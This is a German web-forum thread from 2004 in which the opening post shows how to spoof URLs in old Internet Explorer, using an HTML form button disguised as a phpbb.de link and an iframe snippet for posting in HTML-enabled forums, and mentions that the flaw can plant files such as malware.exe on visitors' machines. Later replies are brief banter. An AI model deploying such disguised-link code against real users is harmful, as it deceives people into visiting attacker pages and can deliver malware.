URLs fälschen

Fragen zu allen Themen rund ums Programmieren außerhalb von phpBB können hier gestellt werden - auch zu anderen Programmiersprachen oder Software wie Webservern und Editoren.
Antworten
Benutzeravatar
Burkhard
Mitglied
Beiträge: 222
Registriert: 15.10.2002 17:16
Wohnort: Berlin
Kontaktdaten:
Kontaktdaten von Burkhard

URLs fälschen

Beitrag von Burkhard »

URLs fälschen geht so: Man erstellt eine Website mit beliebigem Titel mit einem Code ungefähr so (in diesem Beispiel http://www.burks.de/test3.html ):

Code: Alles auswählen

<html><head><title>test</title><meta name="author" content="egal"></head><body text="#000000" bgcolor="#FFFFFF" link="#FF0000" alink="#FF0000" vlink="#FF0000">
<A href="http://www.phpbb.de"><FORM action=http://www.burks.de method=get><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" type=submit value=http://www.phpbb.de></A></body></html>
Im Forum postet man z.B. (HTML muss erlaubt sein):

Code: Alles auswählen

<table border=2><tr><td rowspan=2><iframe src="http://www.burks.de/test3.html" name="framename" width="400" height="400">irgendein Text</iframe></td></tr></table>
Wer auf den vermeintlichen URL www.phpbb.de klickt, kommt auf meine Seite. Hintergrund ist eine Sicherheitslücke, die hier http://www.heise.de/security/news/meldung/46200 beschrieben wird. Man nennt das URL-Spoofing.
Ist dieser Code in einem HTML-Dokument eingebettet, so zeigen Internet Explorer und Outlook Express einen Link auf www.microsoft.com an. Bewegt man den Mauszeiger über den Hyperlink, so zeigt auch die Statusleiste www.microsoft.com an, obwohl der Link eigentlich auf www.malware.com/t-bill.html führt.
Funktionierendes Beispiel: http://www.burks.de/forum/phpBB2/viewtopic.php?p=15414
Mit der Methode kann man jedem IExplorer-DAU beliebige Dateien unterjubeln.
Für pures HTML gilt:
Die harmlose Demo ...führt zunächst auf die Seite www.malware.com, die sofort wieder auf www.microsoft.com umleitet, sodass der Benutzer kaum merkt, dass etwas nicht stimmt. Allein der kurze Aufruf genügt aber, um auf C: die Datei malware.exe zu schreiben.
Burks

itst: ich hab mal aus p_ornos phpbb gemacht ;)
Zuletzt geändert von Burkhard am 13.05.2004 00:54, insgesamt 1-mal geändert.
http://www.burksblog.de
- Ceterum censeo GnuPG omnibus utendum esse -
Nach oben
Benutzeravatar
SoulReaver1989
Mitglied
Beiträge: 204
Registriert: 25.04.2004 13:24
Wohnort: Freiberg am Neckar
Kontaktdaten:
Kontaktdaten von SoulReaver1989

Beitrag von SoulReaver1989 »

Du hättest ned unbedingt die Seite verlinken müssen :o
Langeweile?
Schick Feuer an die 112 und sofort stehen 20 lustige Leute mit roten Partyhüten vor deiner Tür!
Nach oben
Benutzeravatar
kolja
Mitglied
Beiträge: 1546
Registriert: 13.05.2005 16:39
Wohnort: münster

Re: URLs fälschen

Beitrag von kolja »

itst: ich hab mal aus p_ornos phpbb gemacht ;)
heisst das nicht pornos ?
Das Leben ist unberechenbar - deshalb ist Improvisation wichtiger als Planung!

Es ist besser zu geben, als zu leihen, und kostet ungefähr gleichviel.

.: Münsters Reggae Forum :.
Nach oben
Benutzeravatar
gn#36
Ehrenadmin
Beiträge: 9313
Registriert: 01.10.2006 16:20
Wohnort: Ganz in der Nähe...
Kontaktdaten:
Kontaktdaten von gn#36

Beitrag von gn#36 »

Leichenfledderer! :evil: Das Thema hat schon fast Antikwert. :roll:
Begegnungen mit dem Chaos sind fast unvermeidlich, Aber nicht katastrophal, solange man den Durchblick behält.
Übertreiben sollte man's im Forum aber nicht mit dem Chaos, denn da sollen ja andere durchblicken und nicht nur man selbst.
Nach oben
Antworten

Zurück zu „Coding & Technik“